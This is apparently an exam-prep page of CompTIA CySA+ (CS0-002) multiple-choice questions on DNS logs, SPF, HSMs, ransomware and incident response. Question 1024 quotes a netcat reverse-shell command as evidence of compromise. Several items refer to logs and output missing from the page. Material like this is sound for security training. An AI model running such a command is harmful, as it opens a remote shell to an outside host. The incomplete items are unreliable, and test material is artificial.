CS0-002 Exam Details

  • Exam Code
    :CS0-002
  • Exam Name
    :CompTIA Cybersecurity Analyst (CySA+)
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :1059 Q&As
  • Last Updated
    :Aug 04, 2026

CompTIA CS0-002 Online Questions & Answers

  • Question 1021:

    A security analyst is reviewing the following DNS logs as part of security-monitoring activities:

    Which of the following MOST likely occurred?

    A. The attack used an algorithm to generate command and control information dynamically
    B. The attack attempted to contact www.google.com to verify Internet connectivity
    C. The attack used encryption to obfuscate the payload and bypass detection by an IDS
    D. The attack caused an internal host to connect to a command and control server

  • Question 1022:

    Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server where it is located.

    Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?

    A. tail -10000 Massivelog.log > extract.txt
    B. info tail n -10000 Massivelog.log | extract.txt;
    C. get content `./Massivelog.log' -Last 10000 | extract.txt
    D. get-content `./Massivelog.log' -Last 10000 > extract.txt;

  • Question 1023:

    A security analyst is evaluating the following support ticket:

    Issue: Marketing campaigns are being filtered by the customer's email servers.

    Description: Our marketing partner cannot send emails using our email address. The following log messages were collected from multiple customers:

    The SPF result is PermError.

    The SPF result is SoftFail or Fail.

    The 550 SPF check failed.

    Which of the following should the analyst do next?

    A. Ask the marketing partner's ISP to disable the DKIM setting.
    B. Request approval to disable DMARC on the company's ISP.
    C. Ask the customers to disable SPF validation.
    D. Request a configuration change on the company's public DNS.

  • Question 1024:

    A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

    In some of the portal's startup command files, the following command appears: nc /bin/sh 72.14.1.36 4444 Investigating further, the analyst runs Netstat and obtains the following output

    Which of the following is the best step for the analyst to take NEXT?

    A. Initiate the security incident response process
    B. Recommend training to avoid mistakes in production command files
    C. Delete the unknown files from the production servers
    D. Patch a new vulnerability that has been discovered
    E. Manually review the robots .txt file for errors

  • Question 1025:

    A managed security service provider (MSSP) has alerted a user that an account was added to the local administrator group for the servers named EC2AMAZ-HG87B4 and EC2AMAZ-B643M2. A security analyst logs in to the cloud provider's graphical user interface to determine the IP addresses of the servers and sees the following data:

    Which of the following changes to the current architecture would work BEST to help the analyst to troubleshoot future alerts?

    A. Rename all hosts to the value listed in the instance ID field.
    B. Create a standard naming convention for all hostnames.
    C. Create an asset tag that identifies each instance by hostname.
    D. Instruct the MSSP to add the platform name from the cloud console to all alerts.

  • Question 1026:

    Which of the following technologies can be used to store digital certificates and is typically used in high- security implementations where integrity is paramount?

    A. HSM
    B. eFuse
    C. UEFI
    D. Self-encrypting drive

  • Question 1027:

    Which of the following types of policies is used to regulate data storage on the network?

    A. Password
    B. Acceptable use
    C. Account management
    D. Retention

  • Question 1028:

    Which of the following MOST accurately describes an HSM?

    A. An HSM is a low-cost solution for encryption.
    B. An HSM can be networked based or a removable USB
    C. An HSM is slower at encrypting than software
    D. An HSM is explicitly used for MFA

  • Question 1029:

    While conducting research on malicious domains, a threat intelligence analyst received a blue screen of death. The analyst rebooted and received a message stating that the computer had been locked and could only be opened by following the instructions on the screen. Which of the following combinations describes the MOST likely threat and the PRIMARY mitigation for the threat?

    A. Ransomware and update antivirus
    B. Account takeover and data backups
    C. Ransomware and full disk encryption
    D. Ransomware and data backups

  • Question 1030:

    A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator is able to ping every device on the network and confirms that the network is very slow.

    Output:

    Given the above results, which of the following should the administrator investigate FIRST?

    A. The AP-Workshop device
    B. The AP-Reception device
    C. The device at 192.168.1.4
    D. The AP-IT device
    E. The user's PC

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your CS0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.